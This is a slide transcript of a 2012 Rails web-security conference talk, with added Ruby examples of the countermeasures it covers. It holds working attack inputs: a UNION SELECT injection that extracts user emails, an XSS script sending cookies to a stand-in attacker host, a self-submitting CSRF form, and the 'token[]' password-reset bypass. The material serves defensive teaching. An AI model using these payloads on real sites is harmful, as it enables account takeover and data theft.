Web Application Security in Rails

Talk I gave in RailsIsrael 2012 conference

Speaker notes:
  • Can do defacement as well
  • Was also found at ThoughtBot clearance – Rails authentication gem

Slide transcript: Web Application Security in Rails

    1. Web Application Security in Rails. Uri Nativ, RailsIsrael 2012
    2. Uri Nativ, @unativ, Head of Engineering, Klarna Tel Aviv. #railsisrael
    3. Buy Now, Pay Later: 1. Shop online 2. Receive your goods 3. Pay
    4. Alice
    5. Bob
    6. Alice and Bob
    7. Alice and Bob
    8. Alice and Bob: Like, duh?
    9. Alice and Bob: <html> <title> #$@# MicroBlogging %#@&*#$ </title> ...
    10. Alice and Bob: Hack it!
    11. SQL Injection
    12. SQL Injection: the search query interpolates user input straight into the SQL string.
        @results = Micropost.where("content LIKE '%#{params[:query]}%'").all
        SELECT microposts.* FROM microposts WHERE (content LIKE '%SEARCHSTRING%')
    13. SQL Injection: the same query with a crafted search string.
        SELECT microposts.* FROM microposts WHERE (content LIKE '%SEARCHSTRING%')
        Search string: XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --
    14. SQL Injection: the resulting statement, which returns user e-mail addresses.
        SELECT microposts.* FROM microposts WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
    15. SQL Injection: the same resulting statement (repeated slide).
        SELECT microposts.* FROM microposts WHERE (content LIKE '%XXX') UNION SELECT 1, email, 1, 1, 1 FROM users -- %')
    16. SQL Injection - countermeasures: bind the value with a placeholder instead of interpolating it.
        @results = Micropost.where("content LIKE ?", "%#{params[:query]}%").all
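The following example is added here and is not code from the talk or from the sample app: it shows in plain Ruby (no ActiveRecord) why the "?" placeholder on slide 16 neutralises the search string from slide 13. The quoting rule it applies (double every single quote) is the standard SQL rule that ActiveRecord's bind sanitising uses for string values; the function names and the sql_outside_literals check are this example's own.

```ruby
# Quote a Ruby value as a SQL string literal: every single quote is doubled,
# so the value can never terminate the literal it is placed in.
def quote_sql_string(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# Vulnerable form (slide 12): the user input becomes part of the SQL text.
def search_sql_unsafe(query)
  "SELECT microposts.* FROM microposts WHERE (content LIKE '%#{query}%')"
end

# Minimal stand-in for ActiveRecord's "?" binding: each value replaces one
# placeholder as a quoted literal. Raises if placeholders and values differ.
def bind_sql(template, *values)
  parts = template.split("?", -1)
  unless parts.size == values.size + 1
    raise ArgumentError, "placeholder/value count mismatch"
  end
  parts.zip(values.map { |v| quote_sql_string(v) } + [""]).flatten.join
end

# Countermeasure form (slide 16): the whole "%...%" pattern is bound as a value.
def search_sql_safe(query)
  bind_sql("SELECT microposts.* FROM microposts WHERE (content LIKE ?)", "%#{query}%")
end

# Review helper: blank out every string literal and return what remains.
# Any SQL keyword that survives this came from outside a literal, i.e. from
# the statement's own text, which is where injected input ends up.
def sql_outside_literals(sql)
  sql.gsub(/'(?:[^']|'')*'/, "''")
end

# Constructed input: the search string shown on slide 13.
PAYLOAD = "XXX') UNION SELECT 1, email, 1, 1, 1 FROM users --"

if __FILE__ == $PROGRAM_NAME
  puts "unsafe: #{search_sql_unsafe(PAYLOAD)}"
  puts "safe:   #{search_sql_safe(PAYLOAD)}"
end
```

Note that binding protects the structure of the statement, not the semantics of LIKE: "%" and "_" inside the user's value are still wildcards, so a search for "%" matches every row. If that matters, escape those two characters in the value before binding it.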
    17. Cross Site Scripting (XSS)
    18. XSS: the view outputs user content unescaped.
        <span class="content"> <%= raw feed_item.content %> </span>
    19. XSS: a post whose content is a script that sends the visitor's cookie to the attacker.
        <script> document.write('<img src="http://www.attacker.com/x.png?' + document.cookie + '">'); </script>
    20. XSS - countermeasures: sanitize with an explicit tag whitelist.
        <span class="content"> <%= sanitize feed_item.content, :tags => ['a'] %> </span>
    21. XSS. The Attack: execute arbitrary code / defacement; JSON is not escaped by default; CSS can be injected as well. Countermeasures: never trust data from the users; use Markdown (e.g. the Redcarpet gem).
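An added example, not from the talk: the difference between raw output (slide 18) and the escaped output that <%= %> produces by default in Rails 3 and later, using ERB::Util.html_escape from the Ruby standard library, which is the method Rails' h helper builds on. The sanitize_links function is a constructed stand-in for the whitelist behaviour of the sanitize helper on slide 20 (only <a href> with an http(s) or relative URL survives); it is not Rails' implementation, and the function names are this example's own.

```ruby
require "erb"

# Slide 18: raw interpolation, the content reaches the browser unchanged.
def render_raw(content)
  %(<span class="content">#{content}</span>)
end

# Rails 3+ default for <%= %>: &, <, >, " and ' are replaced by entities,
# so markup in the content is displayed as text, never parsed as HTML.
def render_escaped(content)
  %(<span class="content">#{ERB::Util.html_escape(content)}</span>)
end

# Simplified whitelist sanitiser (constructed, not Rails' sanitize):
# keeps <a href="http(s)://..."> and </a>, escapes every other character.
def sanitize_links(content)
  out = +""
  rest = content.dup
  until rest.empty?
    open_tag = rest.match(%r{\A<a\s+href="([^"<>]*)"\s*>}i)
    if open_tag && open_tag[1] =~ %r{\A(https?://|/)}i
      out << %(<a href="#{ERB::Util.html_escape(open_tag[1])}">)
      rest = open_tag.post_match
    elsif (close_tag = rest.match(%r{\A</a\s*>}i))
      out << "</a>"
      rest = close_tag.post_match
    else
      out << ERB::Util.html_escape(rest[0])
      rest = rest[1..-1]
    end
  end
  out
end

# Constructed input: the cookie-stealing post from slide 19.
PAYLOAD = %(<script>document.write('<img src="http://www.attacker.com/x.png?' + document.cookie + '">');</script>)

if __FILE__ == $PROGRAM_NAME
  puts render_raw(PAYLOAD)
  puts render_escaped(PAYLOAD)
  puts sanitize_links(%(<a href="http://example.com">link</a>) + PAYLOAD)
end
```

Escaping everything is the safe default; a whitelist sanitiser is only needed when users are meant to post some markup, and then the whitelist should be as short as the one on slide 20.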
    22. Cross Site Request Forgery (CSRF)
    23. CSRF: www.blog.com (1)
    24. CSRF: www.blog.com and www.freeiPad.com. "Click here for free iPad" (2)
        <form name="evilform" action="www.blog.com/…"> … <script> document.evilform.submit() </script>
    25. CSRF: www.blog.com and www.freeiPad.com (3)
        <form name="evilform" action="www.blog.com/…"> … <script> document.evilform.submit() </script>
    26. CSRF: www.blog.com and www.freeiPad.com. The victim's browser sends POST /blogpost with Content="Kick Me!" (4)
        <form name="evilform" action="www.blog.com/…"> … <script> document.evilform.submit() </script>
    27. CSRF – Authenticity Token
        <input name="authenticity_token" type="hidden" value="vyFdEgofzU4oSJJn5wypxq4"/>
    28. CSRF, routes.rb: a route that accepts any HTTP verb for a destructive action.
        match '/delete_post/:id', to: 'microposts#destroy'
    29. CSRF: the default protection disabled.
        class ApplicationController < ActionController::Base
          # commented to easily test forms
          # protect_from_forgery
          ...
        end
    30. CSRF. The Attack: the attacker sends requests on the victim's behalf; doesn't depend on XSS; the attacker doesn't need to be logged in. Countermeasures: use the Rails CSRF default protection (do not override it); use GET for queries; use POST/DELETE/… when updating data; add a sign-out link.
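An added example, not from the talk: the check that protect_from_forgery (slide 29) performs, written as plain Ruby over hash-shaped sessions and requests so it runs without Rails, and replayed against the www.freeiPad.com scenario of slides 23 to 26. The function names, the :csrf_token session key and the request hash layout are this example's own; the hidden field name authenticity_token is the one from slide 27.

```ruby
require "securerandom"

# Verbs that must not change state, so they are not token-checked (as in Rails).
SAFE_METHODS = %w[GET HEAD OPTIONS].freeze

# Called when the site renders its own form: mint a random token, keep it in
# the session, and embed it in the form as the hidden authenticity_token field.
def issue_token(session)
  session[:csrf_token] ||= SecureRandom.urlsafe_base64(32)
end

# Constant-time comparison so the check does not leak the token through timing.
def secure_equal?(a, b)
  return false unless a.is_a?(String) && b.is_a?(String) && a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# request = { method: "POST", session: {...}, params: {...} }
# Returns :allowed when the request may proceed, :rejected otherwise.
def verify_request(request)
  return :allowed if SAFE_METHODS.include?(request[:method])
  expected = request[:session][:csrf_token]
  given = request[:params]["authenticity_token"]
  expected && secure_equal?(expected, given) ? :allowed : :rejected
end

# Constructed scenario from the slides: the victim is logged in to www.blog.com,
# so the browser attaches the session cookie to the evil form's POST as well.
# The forged form cannot contain the token, because www.freeiPad.com never saw it.
def freeipad_scenario
  session = {}                    # the victim's www.blog.com session
  token = issue_token(session)    # set when www.blog.com rendered its own form
  legitimate = { method: "POST", session: session,
                 params: { "content" => "hello", "authenticity_token" => token } }
  forged = { method: "POST", session: session,
             params: { "content" => "Kick Me!" } }
  { legitimate: verify_request(legitimate), forged: verify_request(forged) }
end

if __FILE__ == $PROGRAM_NAME
  p freeipad_scenario
end
```

The early return for safe methods is why slide 28 matters: a route declared with match answers GET as well, so a destroy action reached by GET is never token-checked. Keep state changes on POST/DELETE, as slide 30 says, and the token check covers them.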
    31. Rails Specific Attacks
    32. Mass Assignment (boo [gotcha!])
    33. Mass Assignment
        def create
          @user = User.new(params[:user])
          ...
        end
    34. Mass Assignment: the same action, posted with extra attributes.
        def create
          @user = User.new(params[:user])
          ...
        end
        params[:user] = { :name => "gotcha", :admin => true }
    35. Mass Assignment - countermeasures, Blacklist
        class User < ActiveRecord::Base
          attr_protected :admin
          ...
        end
    36. Mass Assignment - countermeasures, Whitelist
        class User < ActiveRecord::Base
          attr_accessible :name, :email, :password, :password_confirmation
          ...
    37. Mass Assignment - countermeasures, Global Config (whitelist)
        config.active_record.whitelist_attributes = true
    38. Mass Assignment. The Attack: unprotected by default :( Countermeasures: Whitelist; Blacklist; Strong Parameters (whitelist): Rails 4, logic moved to the controller, available as a gem.
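An added example, not from the talk: a plain-Ruby User class that mirrors User.new(params[:user]) from slides 33 and 34, together with the two fixes the slides list, a model-side whitelist in the style of attr_accessible (slide 36) and a controller-side permit in the style of strong parameters (slide 38). The class, the ACCESSIBLE constant and the permit and create_* functions are this example's own, not ActiveRecord's or the gem's.

```ruby
class User
  attr_reader :name, :email, :admin

  # Model-side whitelist: the only attributes mass assignment may set.
  ACCESSIBLE = %i[name email].freeze

  # whitelist: false reproduces the unprotected default of the slides.
  def initialize(attributes = {}, whitelist: false)
    @admin = false
    attributes.each do |key, value|
      key = key.to_sym
      next if whitelist && !ACCESSIBLE.include?(key)
      instance_variable_set("@#{key}", value)
    end
  end
end

# Controller-side whitelist (what strong parameters does): a copy of the
# submitted hash that contains only the permitted keys.
def permit(params, allowed)
  allowed = allowed.map(&:to_s)
  params.select { |key, _| allowed.include?(key.to_s) }
end

# Constructed request body from slide 34.
GOTCHA_PARAMS = { "name" => "gotcha", "admin" => true }.freeze

def create_unprotected(params)          # slide 33
  User.new(params)
end

def create_with_model_whitelist(params) # slide 36, attr_accessible style
  User.new(params, whitelist: true)
end

def create_with_strong_params(params)   # slide 38, strong parameters style
  User.new(permit(params, %i[name email]))
end

if __FILE__ == $PROGRAM_NAME
  [:create_unprotected, :create_with_model_whitelist, :create_with_strong_params].each do |action|
    user = send(action, GOTCHA_PARAMS)
    puts "#{action}: name=#{user.name.inspect} admin=#{user.admin}"
  end
end
```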
    39. SQL Injection Vulnerability in Ruby on Rails (CVE-2012-2661)
    40. CVE-2012-2661 SQL Injection: the password-reset lookup and the SQL it normally produces.
        User.where(:id => params[:user_id], :reset_token => params[:token])
        SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token = 'XYZ' LIMIT 1
    41. CVE-2012-2661 SQL Injection: with the token parameter sent as an empty array.
        /users/6/password/edit?token[]
        SELECT users.* FROM users WHERE users.id = 6 AND users.reset_token IS NULL LIMIT 1
    42. CVE-2012-2661 SQL Injection. The Attack: SQL Injection. Affected version: Rails < 3.2.4. Countermeasures: upgrade to Rails 3.2.4 or higher.
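An added example, not from the talk: why "token[]" on slide 41 turns the reset-token comparison into IS NULL, and the input check that closes the hole in application code regardless of framework version. It is plain Ruby; predicate_for imitates how ActiveRecord of that era expanded a where(Hash) (nil to IS NULL, an array to IN, an array holding only nil to IS NULL), and the parsed value { "token" => [nil] } is what Rack's nested query parser yields for "token[]". All function names are this example's own.

```ruby
# Integers are emitted bare, everything else as a quoted literal.
def quote_sql_value(value)
  value.is_a?(Integer) ? value.to_s : "'" + value.to_s.gsub("'", "''") + "'"
end

# Imitation of the hash-condition expansion, one column at a time.
def predicate_for(column, value)
  case value
  when nil
    "#{column} IS NULL"
  when Array
    present = value.compact
    if present.empty?
      "#{column} IS NULL"   # [nil] collapses to IS NULL: the CVE-2012-2661 case
    else
      in_list = "#{column} IN (#{present.map { |v| quote_sql_value(v) }.join(', ')})"
      present.size == value.size ? in_list : "(#{in_list} OR #{column} IS NULL)"
    end
  else
    "#{column} = #{quote_sql_value(value)}"
  end
end

def where_sql(conditions)
  predicates = conditions.map { |column, value| predicate_for("users.#{column}", value) }
  "SELECT users.* FROM users WHERE #{predicates.join(' AND ')} LIMIT 1"
end

# The controller's side. With strict: true the token must be a non-empty
# String before it ever reaches the query, so arrays and nil are refused
# and a record with a NULL reset_token can never be matched.
def reset_conditions(params, strict:)
  token = params["token"]
  if strict && !(token.is_a?(String) && !token.empty?)
    raise ArgumentError, "reset token must be a non-empty string"
  end
  { id: Integer(params["user_id"]), reset_token: token }
end

# Constructed inputs: slide 40's normal request and slide 41's "?token[]".
NORMAL_PARAMS = { "user_id" => "6", "token" => "XYZ" }.freeze
EMPTY_ARRAY_PARAMS = { "user_id" => "6", "token" => [nil] }.freeze

if __FILE__ == $PROGRAM_NAME
  puts where_sql(reset_conditions(NORMAL_PARAMS, strict: false))
  puts where_sql(reset_conditions(EMPTY_ARRAY_PARAMS, strict: false))
end
```

Upgrading, as slide 42 says, is the real fix; the type check is the belt-and-braces layer for any lookup where the value comes from the URL and a NULL column would otherwise match.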
    43. Brakeman
        -------------------------------------------------
        | Warning Type               | Total |
        -------------------------------------------------
        | Cross Site Scripting       | 2     |
        | Cross-Site Request Forgery | 1     |
        | Denial of Service          | 1     |
        | Redirect                   | 1     |
        | SQL Injection              | 4     |
        -------------------------------------------------
    44. Conclusions
    45. Make Love not War
    46. Conclusions: know the threats – OWASP Top 10; follow Rails conventions. Ruby on Rails Security Guide: http://guides.rubyonrails.org/security.html. The Ruby on Rails security project: http://www.rorsecurity.info. Rails security mailing list: http://groups.google.com/group/rubyonrails-security
    47. Thanks to… Daniel Amselem for pair programming; Irit Shainzinger for the cool graphics; Michael Hartl for his microblogging app tutorial
    48. Pay Online – Safer and Simpler. https://github.com/unativ/sample_app
